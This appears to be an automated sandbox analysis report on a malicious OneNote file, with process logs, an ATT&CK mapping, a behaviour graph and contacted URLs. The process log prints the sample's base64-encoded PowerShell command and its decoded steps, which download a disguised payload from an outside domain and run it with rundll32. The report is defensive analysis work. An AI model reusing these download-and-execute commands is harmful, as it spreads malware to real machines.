Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3232Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7274Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1504Thread sleep count: 3232 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1324Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4648Thread sleep count: 7274 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4872Thread sleep time: -5534023222112862s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4768Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3228Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1964Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell [system.text.encoding]::ascii.getstring([system.convert]::frombase64string('dqpazwnobybvzmyncnbvd2vyc2hlbgwgsw52b2tllvdlyljlcxvlc3qglvvsssbodhrwczovl25lcnvsz3lta2hhbmeuy29tl0ndb04vmdeuz2lmic1pdxrgawxliem6xhbyb2dyyw1kyxrhxhb1dhr5lmpwzw0kcnvuzgxsmzigqzpcchjvz3jhbwrhdgfcchv0dhkuanbnlfdpbmqncmv4axqncg=='))
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell [system.text.encoding]::ascii.getstring([system.convert]::frombase64string('dqpazwnobybvzmyncnbvd2vyc2hlbgwgsw52b2tllvdlyljlcxvlc3qglvvsssbodhrwczovl25lcnvsz3lta2hhbmeuy29tl0ndb04vmdeuz2lmic1pdxrgawxliem6xhbyb2dyyw1kyxrhxhb1dhr5lmpwzw0kcnvuzgxsmzigqzpcchjvz3jhbwrhdgfcchv0dhkuanbnlfdpbmqncmv4axqncg==')) Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnBvd2Vyc2hlbGwgSW52b2tlLVdlYlJlcXVlc3QgLVVSSSBodHRwczovL25lcnVsZ3lta2hhbmEuY29tL0NDb04vMDEuZ2lmIC1PdXRGaWxlIEM6XHByb2dyYW1kYXRhXHB1dHR5LmpwZw0KcnVuZGxsMzIgQzpccHJvZ3JhbWRhdGFccHV0dHkuanBnLFdpbmQNCmV4aXQNCg==')) Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\ProgramData\in.cmdJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -URI https://nerulgymkhana.com/CCoN/01.gif -OutFile C:\programdata\putty.jpgJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\programdata\putty.jpg,WindJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1
Command and Scripting Interpreter		2
Registry Run Keys / Startup Folder		11
Process Injection		1
Masquerading		OS Credential Dumping1
Process Discovery		Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
Encrypted Channel		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts1
Exploitation for Client Execution		Boot or Logon Initialization Scripts2
Registry Run Keys / Startup Folder		21
Virtualization/Sandbox Evasion		LSASS Memory21
Virtualization/Sandbox Evasion		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
Ingress Tool Transfer		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain Accounts1
PowerShell		Logon Script (Windows)Logon Script (Windows)11
Process Injection		Security Account Manager1
Application Window Discovery		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
Non-Application Layer Protocol		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
Rundll32		NTDS1
Remote System Discovery		Distributed Component Object ModelInput CaptureScheduled Transfer13
Application Layer Protocol		SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
File and Directory Discovery		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials12
System Information Discovery		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 800789 Sample: Original.one Startdate: 07/02/2023 Architecture: WINDOWS Score: 64 32 Malicious sample detected (through community Yara rule) 2->32 34 Sigma detected: Execute DLL with spoofed extension 2->34 36 Document exploit detected (process start blacklist hit) 2->36 7 cmd.exe 2 2->7         started        11 ONENOTE.EXE 47 372 2->11         started        process3 file4 28 C:\ProgramData\in.cmd, ASCII 7->28 dropped 38 Suspicious powershell command line found 7->38 13 cmd.exe 1 7->13         started        15 powershell.exe 7 7->15         started        17 conhost.exe 7->17         started        19 ONENOTEM.EXE 1 11->19         started        signatures5 process6 process7 21 powershell.exe 14 14 13->21         started        24 conhost.exe 13->24         started        26 rundll32.exe 13->26         started        dnsIp8 30 nerulgymkhana.com 109.203.123.62, 443, 49704 NODE4-ASGB United Kingdom 21->30

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Original.one3%VirustotalBrowse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
nerulgymkhana.com1%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%URL Reputationsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%URL Reputationsafe
https://api.scheduler.0%URL Reputationsafe
https://api.scheduler.0%URL Reputationsafe
https://my.microsoftpersonalcontent.com0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://api.aadrm.com0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h0%Avira URL Cloudsafe
https://d.docs.live.net0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://make.powerautomate.com0%URL Reputationsafe
https://asgsmsproxyapi.azurewebsites.net/0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://nerulgymkhana.com/CCoN/01.gif2%VirustotalBrowse
https://nerulgymkhana.com/CCoN/01.gif0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
nerulgymkhana.com
109.203.123.62
truefalseunknown

Contacted URLs

NameMaliciousAntivirus DetectionReputation
https://nerulgymkhana.com/CCoN/01.giffalse
  • 2%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://api.diagnosticssdf.office.comD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
    		high
    https://login.microsoftonline.com/D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
      		high
      https://shell.suite.office.com:1443D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
        		high
        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
          		high
          https://autodiscover-s.outlook.com/D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
            		high
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
              		high
              https://cdn.entity.D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              https://api.addins.omex.office.net/appinfo/queryD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                		high
                https://clients.config.office.net/user/v1.0/tenantassociationkeyD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                  		high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                    		high
                    https://powerlift.acompli.netD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.comD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://lookup.onenote.com/lookup/geolocation/v1D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                      		high
                      https://cortana.aiD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                        		high
                        https://cloudfiles.onenote.com/upload.aspxD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                          		high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                            		high
                            https://entitlement.diagnosticssdf.office.comD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                              		high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                		high
                                https://api.aadrm.com/D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                  		high
                                  https://api.microsoftstream.com/api/D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                    		high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                      		high
                                      https://cr.office.comD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                        		high
                                        https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;hD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                        • Avira URL Cloud: safe
                                        		low
                                        https://portal.office.com/account/?ref=ClientMeControlD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                          		high
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.274530600.0000027D500B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://graph.ppe.windows.netD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                              		high
                                              https://res.getmicrosoftkey.com/api/redemptioneventsD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://powerlift-frontdesk.acompli.netD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://tasks.office.comD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                		high
                                                https://officeci.azurewebsites.net/api/D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                https://sr.outlook.office.net/ws/speech/recognize/assistant/workD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                  		high
                                                  https://api.scheduler.D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://my.microsoftpersonalcontent.comD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://store.office.cn/addinstemplateD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://api.aadrm.comD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://outlook.office.com/autosuggest/api/v1/init?cvid=D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                    		high
                                                    https://globaldisco.crm.dynamics.comD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                      		high
                                                      https://messaging.engagement.office.com/D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                        		high
                                                        https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                          		high
                                                          https://dev0-api.acompli.net/autodetectD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://www.odwebp.svc.msD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://api.diagnosticssdf.office.com/v2/feedbackD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                            		high
                                                            https://api.powerbi.com/v1.0/myorg/groupsD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                              		high
                                                              https://web.microsoftstream.com/video/D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                                		high
                                                                https://api.addins.store.officeppe.com/addinstemplateD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://graph.windows.netD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                                  		high
                                                                  https://dataservice.o365filtering.com/D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://officesetup.getmicrosoftkey.comD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://analysis.windows.net/powerbi/apiD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                                    		high
                                                                    https://prod-global-autodetect.acompli.net/autodetectD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://outlook.office365.com/autodiscover/autodiscover.jsonD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                                      		high
                                                                      https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                                        		high
                                                                        https://consent.config.office.com/consentcheckin/v1.0/consentsD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                                          		high
                                                                          https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                                            		high
                                                                            https://learningtools.onenote.com/learningtoolsapi/v2.0/GetvoicesD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                                              		high
                                                                              https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                                                		high
                                                                                https://d.docs.live.netD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://ncus.contentsync.D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                                                  		high
                                                                                  https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                                                    		high
                                                                                    http://weather.service.msn.com/data.aspxD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                                                      		high
                                                                                      https://apis.live.net/v5.0/D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                                                        		high
                                                                                        https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                                                          		high
                                                                                          https://messaging.lifecycle.office.com/D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                                                            		high
                                                                                            https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                                                              		high
                                                                                              https://pushchannel.1drv.msD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                                                                		high
                                                                                                https://management.azure.comD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                                                                  		high
                                                                                                  https://outlook.office365.comD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                                                                    		high
                                                                                                    https://wus2.contentsync.D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    https://incidents.diagnostics.office.comD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                                                                      		high
                                                                                                      https://clients.config.office.net/user/v1.0/iosD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                                                                        		high
                                                                                                        https://make.powerautomate.comD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        https://insertmedia.bing.office.net/odc/insertmediaD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                                                                          		high
                                                                                                          https://o365auditrealtimeingestion.manage.office.comD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                                                                            		high
                                                                                                            https://outlook.office365.com/api/v1.0/me/ActivitiesD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                                                                              		high
                                                                                                              https://api.office.netD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                                                                                		high
                                                                                                                https://incidents.diagnosticssdf.office.comD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                                                                                  		high
                                                                                                                  https://asgsmsproxyapi.azurewebsites.net/D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  https://clients.config.office.net/user/v1.0/android/policiesD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                                                                                    		high
                                                                                                                    https://entitlement.diagnostics.office.comD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                                                                                      		high
                                                                                                                      https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                                                                                        		high
                                                                                                                        https://substrate.office.com/search/api/v2/initD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                                                                                          		high
                                                                                                                          https://outlook.office.com/D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                                                                                            		high
                                                                                                                            https://storage.live.com/clientlogs/uploadlocationD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                                                                                              		high
                                                                                                                              https://outlook.office365.com/D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                                                                                                		high
                                                                                                                                https://webshell.suite.office.comD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                                                                                                  		high
                                                                                                                                  https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                                                                                                    		high
                                                                                                                                    https://substrate.office.com/search/api/v1/SearchHistoryD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                                                                                                      		high
                                                                                                                                      https://management.azure.com/D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                                                                                                        		high
                                                                                                                                        https://messaging.lifecycle.office.com/getcustommessage16D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                                                                                                          		high
                                                                                                                                          https://clients.config.office.net/c2r/v1.0/InteractiveInstallationD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                                                                                                            		high
                                                                                                                                            https://login.windows.net/common/oauth2/authorizeD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                                                                                                              		high
                                                                                                                                              https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileD95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              		unknown
                                                                                                                                              https://graph.windows.net/D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drfalse
                                                                                                                                                		high
